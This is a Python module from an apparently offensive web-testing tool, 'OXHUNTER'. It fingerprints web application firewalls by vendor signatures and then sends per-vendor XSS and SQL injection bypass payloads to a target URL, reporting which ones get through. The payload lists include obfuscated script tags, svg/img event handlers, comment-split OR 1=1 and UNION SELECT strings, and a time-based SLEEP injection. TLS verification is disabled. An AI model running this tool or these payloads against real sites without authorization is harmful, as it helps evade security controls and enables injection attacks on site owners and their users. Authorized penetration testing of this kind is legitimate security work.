"""
OXHUNTER - waf_detector.py
WAF Fingerprinting + Auto Bypass
"""

import requests
import urllib3
from typing import Optional, Dict, List
urllib3.disable_warnings()

# ─────────────────────────────────────────────
#  WAF SIGNATURES
# ─────────────────────────────────────────────
WAF_SIGNATURES = {
    "Cloudflare"       : {"headers": ["cf-ray", "cf-cache-status"], "body": ["cloudflare", "__cf_bm"], "codes": [403, 503]},
    "AWS WAF"          : {"headers": ["x-amzn-requestid", "x-amz-cf-id"], "body": ["aws", "request blocked"], "codes": [403]},
    "Akamai"           : {"headers": ["x-akamai-transformed", "akamai-origin-hop"], "body": ["akamai", "reference #"], "codes": [403]},
    "Imperva/Incapsula": {"headers": ["x-iinfo", "x-cdn"], "body": ["incapsula", "_incap_ses"], "codes": [403]},
    "ModSecurity"      : {"headers": ["x-modsecurity"], "body": ["modsecurity", "mod_security", "not acceptable"], "codes": [406, 501]},
    "F5 BIG-IP ASM"    : {"headers": ["x-cnection", "x-wa-info"], "body": ["the requested url was rejected", "f5"], "codes": [403]},
    "Barracuda"        : {"headers": ["x-barracuda-connect"], "body": ["barracuda", "barra"], "codes": [403]},
    "Sucuri"           : {"headers": ["x-sucuri-id", "x-sucuri-cache"], "body": ["sucuri", "cloudproxy"], "codes": [403]},
    "Wordfence"        : {"headers": [], "body": ["wordfence", "generated by wordfence"], "codes": [403]},
    "Fortinet"         : {"headers": ["x-waf-event-info"], "body": ["fortigate", "fortiweb"], "codes": [403]},
}

# ─────────────────────────────────────────────
#  BYPASS PAYLOADS PER WAF
# ─────────────────────────────────────────────
BYPASS_PAYLOADS = {
    "Cloudflare": [
        "<svg/onload=alert(1)>",
        "';alert`1`//",
        "%3Cscript%3Ealert(1)%3C/script%3E",
        "1'/**/OR/**/1=1--",
    ],
    "ModSecurity": [
        "<ScRiPt>alert(1)</ScRiPt>",
        "' /*!OR*/ 1=1--",
        "1/**/UNION/**/SELECT/**/NULL--",
        "<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>",
    ],
    "generic": [
        "<script/x>alert(1)</script>",
        "' OR/**/1=1--",
        "%27%20OR%201%3D1--",
        "<svg onload=alert(1)>",
        "1;SELECT+SLEEP(5)--",
        "<iMg SrC=x OnErRoR=alert(1)>",
    ],
}

DETECTION_PAYLOAD = "' OR 1=1-- <script>alert(1)</script>"


class WAFDetector:

    def __init__(self, timeout: int = 10, proxy: Optional[str] = None):
        self.timeout = timeout
        self.proxies = {"http": proxy, "https": proxy} if proxy else {}

    def _request(self, url: str, payload: str = "") -> Optional[requests.Response]:
        try:
            target = f"{url}?q={payload}" if payload else url
            return requests.get(target, timeout=self.timeout,
                                verify=False, proxies=self.proxies,
                                headers={"User-Agent": "Mozilla/5.0"})
        except Exception:
            return None

    # ── Detect ────────────────────────────────

    def detect(self, url: str) -> Dict:
        """Fingerprint WAF from headers, body, status codes."""
        normal = self._request(url)
        attack = self._request(url, DETECTION_PAYLOAD)

        result = {"waf": None, "confidence": 0, "details": [], "blocked": False}

        if not attack:
            return result

        if normal and normal.status_code != attack.status_code:
            result["blocked"] = True

        h = {k.lower(): v.lower() for k, v in attack.headers.items()}
        b = attack.text.lower()

        for waf, sigs in WAF_SIGNATURES.items():
            score = 0
            matched = []

            for hdr in sigs["headers"]:
                if hdr in h:
                    score += 2
                    matched.append(f"header:{hdr}")

            for kw in sigs["body"]:
                if kw in b:
                    score += 1
                    matched.append(f"body:{kw}")

            if attack.status_code in sigs["codes"]:
                score += 1
                matched.append(f"status:{attack.status_code}")

            if score > result["confidence"]:
                result["confidence"] = score
                result["waf"]        = waf
                result["details"]    = matched

        result["detected"] = result["confidence"] >= 2
        return result

    # ── Bypass ────────────────────────────────

    def get_bypasses(self, waf_name: Optional[str]) -> List[str]:
        """Return bypass payloads for detected WAF."""
        if waf_name and waf_name in BYPASS_PAYLOADS:
            return BYPASS_PAYLOADS[waf_name] + BYPASS_PAYLOADS["generic"]
        return BYPASS_PAYLOADS["generic"]

    def test_bypasses(self, url: str, waf_name: Optional[str] = None) -> List[Dict]:
        """Test bypass payloads and return which ones got through."""
        results  = []
        payloads = self.get_bypasses(waf_name)
        for p in payloads:
            resp = self._request(url, p)
            if resp:
                bypassed = resp.status_code not in [403, 406, 429, 503]
                results.append({"payload": p, "status": resp.status_code, "bypassed": bypassed})
        return results

    def full_scan(self, url: str) -> Dict:
        """Detect WAF + test bypasses in one call."""
        detection = self.detect(url)
        bypasses  = self.test_bypasses(url, detection.get("waf"))
        return {**detection, "bypass_results": bypasses,
                "working_bypasses": [b for b in bypasses if b["bypassed"]]}
